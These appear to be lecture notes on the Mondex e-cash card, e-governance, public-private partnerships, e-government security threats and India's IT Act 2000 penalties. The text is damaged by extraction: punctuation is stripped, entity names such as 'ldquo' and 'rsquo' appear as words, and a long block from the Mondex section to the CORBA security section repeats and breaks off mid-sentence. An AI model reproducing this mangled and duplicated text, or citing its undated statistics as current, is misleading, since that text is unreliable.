Mondex launched in a number of markets during the 1990s expanding from an original trial in
Swindon UK to Hong Kong Guelph and New York It was also trialled on several British
university campuses from the late 1990s including the University of Edinburgh University of
Exeter (between 1997 and 2001) University of York University of Nottingham Aston
University and Sheffield Hallam University
Direct transfer of electronic money between two cards
Transfer of electronic money over the Internet or telephone networks etc
Keep transaction records
Password protection and ldquolock cardrdquo functions
Portable balance finder to check balance
Support multiple currencies
PREPARED BY ARUN PRATAP SINGH 39
39
ADVANTAGES
CONSUMER ndash
Convenience
Accessibility
On chip record of recent transactions
Home load
Internet purchases
MERCHANT ndash
Reliable-Off line payment
Higher security
Low transaction cost
Reduced cash handling
FINANCIAL INSTITUTION ndash
Strengthen customer relationships
New financial and commercial partnerships
Mondex is a concept for an electronic payment system that provides an alternate to cash particularly small currency and coins (micro-payment) The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK
In July 1996 initiated by NatWest and Midland Bank PLC Mondex International Ltd was officially established by 17 major banks from North America AsiaPacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept technology and brand In the same year MasterCard International acquired 51 ownership of Mondex International and fully endorsed the Mondex technology architecture
How does Mondex Protect Privacy ndash
Principles protected
o Limits for collecting personal information
o limits for using disclosing and keeping personal information
o keeping personal information accurate
o safeguarding personal information
PREPARED BY ARUN PRATAP SINGH 40
40
Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions
Limits for using disclosing and keeping personal information
o safeguard deposits
o to re-imburse for non-performance
Keeping personal information accurate
o load and unload are online
o rolling 10 transactions provides exact spend and retailer name
Safeguarding personal information
o firewalls in Multos - between applications - ITSEC 6 designation
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks - Mondex is an unaudited
system
PREPARED BY ARUN PRATAP SINGH 41
41
The design of a Mondex smart card allows end users to transfer funds electronically onto the card
and then utilize the Mondex smart card to make purchases up to the total cash value held on the
card Mondex smart cards provide an electronicpayment system using all the capabilities
associated with smart card technology The Mondex smart card can be a convenient alternative
to cash
Although the design was five years old at the time the Mondex smart card was actually launched
in 1995 ndash two years before MasterCard assumed control of the technology
The banks that currently support the Mondex smart card include National Bank of Canada
Scotiabank Canada Trust Bank of Montreal Le Mouvement des caisses Desjardins and Toronto
Dominion Bank With so many respected lending institutions banking on the idea the Mondex
smart card is worth a closer look
The Mondex smart card has the ability to make card-to-card transfers which is not possible with
standard credit or debit cards When you use a creditdebit card to make a purchase
communication is required between the bank and your card However Mondex cards contain an
embedded microprocessor with sophisticated encryption methods and tamper-proof hardware
designed to protect them from hackers The ability of the Mondex smart card to do offline
transactions means they are less dependent on expensive network infrastructure reducing
transaction costs Offline transactions may seem anonymous however they actually are recorded
in the digital memory of the cardrsquos microprocessor and remain retrievable the next time the card
is used at an ATM or as soon as the retailer uploads transaction data to the bank computer
A significant disadvantage with Mondex is that transactions arenrsquot truly anonymous Unlike pre-
paid phone cards which are also based on smart card technology you canrsquot purchase a Mondex
card without revealing your identity Each card has a unique identification number through which
owners can easily be identified Mondex smart cards have not been as successful as originally
predicted Customers have not been especially satisfied with the card and its services Unlike a
credit or debit card your money may be lost forever if you should lose a Mondex smart card
Losing a Mondex card is just like losing a wallet full of cash With a credit card yoursquore protected
against any loss exceeding $50 dollars This protection is not currently available with a Mondex
smart card
According to the Mondex smart card system it is fully auditable There is a log of the time date
amount and participants of each transaction which hampers the privacy of users Technically
however Mondex canrsquot claim to be a fully auditable system After a number of transactions
overflow can occur as a result of limited memory in the Mondex smart-cards This means that
PREPARED BY ARUN PRATAP SINGH 42
42
significant data may be lost before Mondex is able to retrieve it Critics say this loss of data is a
critical design flaw making it difficult for Mondex to reliably detect fraud
While Mondex smart cards are not a hundred percent secure they do possess the ability to tolerate
minor fraud loss
Mondex believes their electronic payment system is secure They are convinced that critics who
have voice concern over security issues are mistaken and misinformed Perhaps the use of a
Mondex smart card depends on a personal level of trust
E-GOVERNANCE
Although the term lsquoe-Governancersquo has gained currency in recent years there is no standard
definition of this term Different governments and organizations define this term to suit their own
aims and objectives Sometimes the term lsquoe-governmentrsquo is also used instead of lsquoe-
Governancersquo
Several dimensions and factors influence the definition of e-governance or electronic
governance The word ldquoelectronicrdquo in the term e-governance implies technology driven
governance E-governance is the application of information and communication technology (ICT)
for delivering government services exchange of information communication transactions
integration of various stand-alone systems and services between government-to-customer (G2C)
government-to-business (G2B) government-to-government (G2G) as well as back office
processes and interactions within the entire government framework Through e-governance
government services will be made available to citizens in a convenient efficient and transparent
manner The three main target groups that can be distinguished in governance concepts are
government citizens and businessesinterest groups In e-governance there are no distinct
boundaries
Generally four basic models are available ndash government-to-citizen (customer) government-to-
employees government-to-government andgovernment-to-business
Difference between E-Government and E-Governance ndash
Both the terms are treated to be the same however there is some difference between the two
E-government is the use of the ICTs in public administration - combined with organizational
change and new skills - to improve public services and democratic processes and to strengthen
support to public The problem in this definition to be congruence definition of e-governance is
that there is no provision for governance of ICTs As a matter of fact the governance of ICTs
requires most probably a substantial increase in regulation and policy-making capabilities with
all the expertise and opinion-shaping processes among the various social stakeholders of these
PREPARED BY ARUN PRATAP SINGH 43
43
concerns So the perspective of the e-governance is the use of the technologies that both help
governing and have to be governed The Public-Private Partnership (PPP) based e-governance
projects are hugely successful in India United Telecoms Limited known as UTL is a major player
in India on PPP based e-governance projects Each project had mammoth state wide area
networks in these states
E-governance is the future many countries are looking forward to for a corruption-free
government E-government is one-way communication protocol whereas e-governance is two-
way communication protocol The essence of e-governance is to reach the beneficiary and ensure
that the services intended to reach the desired individual has been met with There should be an
auto-response to support the essence of e-governance whereby the Government realizes the
efficacy of its governance E-governance is by the governed for the governed and of the
governed
Establishing the identity of the end beneficiary is a challenge in all citizen-centric services
Statistical information published by governments and world bodies does not always reveal the
facts The best form of e-governance cuts down on unwanted interference of too many layers
while delivering governmental services It depends on good infrastructural setup with the support
of local processes and parameters for governments to reach their citizens or end
beneficiaries Budget for planning development and growth can be derived from well laid out e-
governance systems
Why e-Governance
E-Government can transform citizen service provide access to information to empower citizens
enable their participation in government and enhance citizen economic and social opportunities
so that they can make better lives for themselves and for the next generation
BASIC ARCHITECTURE
PREPARED BY ARUN PRATAP SINGH 44
44
A suggested architecture for e-Governance is shown in the diagram where it is illustrated that
Applications from various departments can be integrated together so as to be accessed by any
terminal or computer from any other department or anywhere through the network This is
because of the characteristics of CORBA - it is location transparent language independent
implementation independent architecture and Operating System independent The applications
connected through CORBAIIOP could be legacy applications wrapped around to suit CORBA
specifications or any new Web application or could be even a data base environment using
Oracle etc Seamless interconnection and thereby effective utility of the entire system of e-
Governance is possible if the middleware is designed to have the necessary services like
Transactions Data Base Management Messaging and Naming
Regarding security aspects CORBA Security standard is built around existing security
specifications such as Distributed Computing Environment (DCE) the Kerberos Protocol and
Generic Security Service (GSS) API While these technologies are heavily weighted Public Key
Security with Secured Socket Layer (SSL) is popular with Internet based transactions
Types of Interactions in e-Governance
e-Governance facilitates interaction between different stake holders in governance These interactions may be described as follows
G2G (Government to Government)
In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities This kind of interaction is only within the sphere of government and can be both horizontal ie between different government agencies as well as between different functional areas within an organization or vertical ie between national provincial and local government agencies as well as between different levels within an organization The primary objective is to increase efficiency performance and output
PREPARED BY ARUN PRATAP SINGH 45
45
G2C (Government to Citizens)
In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly
G2B (Government to Business)
Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently
G2E (Government to Employees) Government is by far the biggest employer and like any organization it has to interact with
its employees on a regular basis This interaction is a two-way process between the
organization and the employee Use of ICT tools helps in making these interactions fast
and efficient on the one hand and increase satisfaction levels of employees on the other
Difference between G2B and B2G
Government to business (G2B)- Refers to the conducting of transactions between
government bodies and business via internet
Business to government (B2G)- Professional affairs conducted between companies and
regional municipal or federal governing bodies B2G typically encompasses the
determination and evaluation of proposal and completion of contract
PUBLIC PRIVATE PARTNERSHIPS
bull Agreement between Government and the Private Sector for the Provision of a Public
Good or Service by the Latter
bull Generally but not always involving
ndash Long Term Contracts
ndash User Charges andor Payments flowing between the Parties
ndash Shared Investments but Mainly Private
PREPARED BY ARUN PRATAP SINGH 46
46
ndash Risk Sharing by the Parties
bull Must be a Partnership
A public-private partnership exists when public sector agencies (federal state or local) join with
private sector entities (companies foundations academic institutions or citizens) and enter into a
business relationship to attain a commonly shared goal that also achieves objectives of the
individual partners
Why do them
bull Fiscal Head Room
bull As a Way of Financing the Project
bull Separate Policy amp Regulation from Operations
PREPARED BY ARUN PRATAP SINGH 47
47
bull Make the Good or Service Available
bull Pay for Performance and Output
bull Introduce Competition ndash For and In the Market
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 38
38
OVERVIEW OF MONDEX
Mondex is a smart card electronic cash system which was originally developed by National
Westminster Bank in the United Kingdom and subsequently sold to MasterCard International
Mondex launched in a number of markets during the 1990s expanding from an original trial in
Swindon UK to Hong Kong Guelph and New York It was also trialled on several British
university campuses from the late 1990s including the University of Edinburgh University of
Exeter (between 1997 and 2001) University of York University of Nottingham Aston
University and Sheffield Hallam University
Direct transfer of electronic money between two cards
Transfer of electronic money over the Internet or telephone networks etc
Keep transaction records
Password protection and ldquolock cardrdquo functions
Portable balance finder to check balance
Support multiple currencies
PREPARED BY ARUN PRATAP SINGH 39
39
ADVANTAGES
CONSUMER ndash
Convenience
Accessibility
On chip record of recent transactions
Home load
Internet purchases
MERCHANT ndash
Reliable-Off line payment
Higher security
Low transaction cost
Reduced cash handling
FINANCIAL INSTITUTION ndash
Strengthen customer relationships
New financial and commercial partnerships
Mondex is a concept for an electronic payment system that provides an alternate to cash particularly small currency and coins (micro-payment) The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK
In July 1996 initiated by NatWest and Midland Bank PLC Mondex International Ltd was officially established by 17 major banks from North America AsiaPacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept technology and brand In the same year MasterCard International acquired 51 ownership of Mondex International and fully endorsed the Mondex technology architecture
How does Mondex Protect Privacy ndash
Principles protected
o Limits for collecting personal information
o limits for using disclosing and keeping personal information
o keeping personal information accurate
o safeguarding personal information
PREPARED BY ARUN PRATAP SINGH 40
40
Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions
Limits for using disclosing and keeping personal information
o safeguard deposits
o to re-imburse for non-performance
Keeping personal information accurate
o load and unload are online
o rolling 10 transactions provides exact spend and retailer name
Safeguarding personal information
o firewalls in Multos - between applications - ITSEC 6 designation
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks - Mondex is an unaudited
system
PREPARED BY ARUN PRATAP SINGH 41
41
The design of a Mondex smart card allows end users to transfer funds electronically onto the card
and then utilize the Mondex smart card to make purchases up to the total cash value held on the
card Mondex smart cards provide an electronicpayment system using all the capabilities
associated with smart card technology The Mondex smart card can be a convenient alternative
to cash
Although the design was five years old at the time the Mondex smart card was actually launched
in 1995 ndash two years before MasterCard assumed control of the technology
The banks that currently support the Mondex smart card include National Bank of Canada
Scotiabank Canada Trust Bank of Montreal Le Mouvement des caisses Desjardins and Toronto
Dominion Bank With so many respected lending institutions banking on the idea the Mondex
smart card is worth a closer look
The Mondex smart card has the ability to make card-to-card transfers which is not possible with
standard credit or debit cards When you use a creditdebit card to make a purchase
communication is required between the bank and your card However Mondex cards contain an
embedded microprocessor with sophisticated encryption methods and tamper-proof hardware
designed to protect them from hackers The ability of the Mondex smart card to do offline
transactions means they are less dependent on expensive network infrastructure reducing
transaction costs Offline transactions may seem anonymous however they actually are recorded
in the digital memory of the cardrsquos microprocessor and remain retrievable the next time the card
is used at an ATM or as soon as the retailer uploads transaction data to the bank computer
A significant disadvantage with Mondex is that transactions arenrsquot truly anonymous Unlike pre-
paid phone cards which are also based on smart card technology you canrsquot purchase a Mondex
card without revealing your identity Each card has a unique identification number through which
owners can easily be identified Mondex smart cards have not been as successful as originally
predicted Customers have not been especially satisfied with the card and its services Unlike a
credit or debit card your money may be lost forever if you should lose a Mondex smart card
Losing a Mondex card is just like losing a wallet full of cash With a credit card yoursquore protected
against any loss exceeding $50 dollars This protection is not currently available with a Mondex
smart card
According to the Mondex smart card system it is fully auditable There is a log of the time date
amount and participants of each transaction which hampers the privacy of users Technically
however Mondex canrsquot claim to be a fully auditable system After a number of transactions
overflow can occur as a result of limited memory in the Mondex smart-cards This means that
PREPARED BY ARUN PRATAP SINGH 42
42
significant data may be lost before Mondex is able to retrieve it Critics say this loss of data is a
critical design flaw making it difficult for Mondex to reliably detect fraud
While Mondex smart cards are not a hundred percent secure they do possess the ability to tolerate
minor fraud loss
Mondex believes their electronic payment system is secure They are convinced that critics who
have voice concern over security issues are mistaken and misinformed Perhaps the use of a
Mondex smart card depends on a personal level of trust
E-GOVERNANCE
Although the term lsquoe-Governancersquo has gained currency in recent years there is no standard
definition of this term Different governments and organizations define this term to suit their own
aims and objectives Sometimes the term lsquoe-governmentrsquo is also used instead of lsquoe-
Governancersquo
Several dimensions and factors influence the definition of e-governance or electronic
governance The word ldquoelectronicrdquo in the term e-governance implies technology driven
governance E-governance is the application of information and communication technology (ICT)
for delivering government services exchange of information communication transactions
integration of various stand-alone systems and services between government-to-customer (G2C)
government-to-business (G2B) government-to-government (G2G) as well as back office
processes and interactions within the entire government framework Through e-governance
government services will be made available to citizens in a convenient efficient and transparent
manner The three main target groups that can be distinguished in governance concepts are
government citizens and businessesinterest groups In e-governance there are no distinct
boundaries
Generally four basic models are available ndash government-to-citizen (customer) government-to-
employees government-to-government andgovernment-to-business
Difference between E-Government and E-Governance ndash
Both the terms are treated to be the same however there is some difference between the two
E-government is the use of the ICTs in public administration - combined with organizational
change and new skills - to improve public services and democratic processes and to strengthen
support to public The problem in this definition to be congruence definition of e-governance is
that there is no provision for governance of ICTs As a matter of fact the governance of ICTs
requires most probably a substantial increase in regulation and policy-making capabilities with
all the expertise and opinion-shaping processes among the various social stakeholders of these
PREPARED BY ARUN PRATAP SINGH 43
43
concerns So the perspective of the e-governance is the use of the technologies that both help
governing and have to be governed The Public-Private Partnership (PPP) based e-governance
projects are hugely successful in India United Telecoms Limited known as UTL is a major player
in India on PPP based e-governance projects Each project had mammoth state wide area
networks in these states
E-governance is the future many countries are looking forward to for a corruption-free
government E-government is one-way communication protocol whereas e-governance is two-
way communication protocol The essence of e-governance is to reach the beneficiary and ensure
that the services intended to reach the desired individual has been met with There should be an
auto-response to support the essence of e-governance whereby the Government realizes the
efficacy of its governance E-governance is by the governed for the governed and of the
governed
Establishing the identity of the end beneficiary is a challenge in all citizen-centric services
Statistical information published by governments and world bodies does not always reveal the
facts The best form of e-governance cuts down on unwanted interference of too many layers
while delivering governmental services It depends on good infrastructural setup with the support
of local processes and parameters for governments to reach their citizens or end
beneficiaries Budget for planning development and growth can be derived from well laid out e-
governance systems
Why e-Governance
E-Government can transform citizen service provide access to information to empower citizens
enable their participation in government and enhance citizen economic and social opportunities
so that they can make better lives for themselves and for the next generation
BASIC ARCHITECTURE
PREPARED BY ARUN PRATAP SINGH 44
44
A suggested architecture for e-Governance is shown in the diagram where it is illustrated that
Applications from various departments can be integrated together so as to be accessed by any
terminal or computer from any other department or anywhere through the network This is
because of the characteristics of CORBA - it is location transparent language independent
implementation independent architecture and Operating System independent The applications
connected through CORBAIIOP could be legacy applications wrapped around to suit CORBA
specifications or any new Web application or could be even a data base environment using
Oracle etc Seamless interconnection and thereby effective utility of the entire system of e-
Governance is possible if the middleware is designed to have the necessary services like
Transactions Data Base Management Messaging and Naming
Regarding security aspects CORBA Security standard is built around existing security
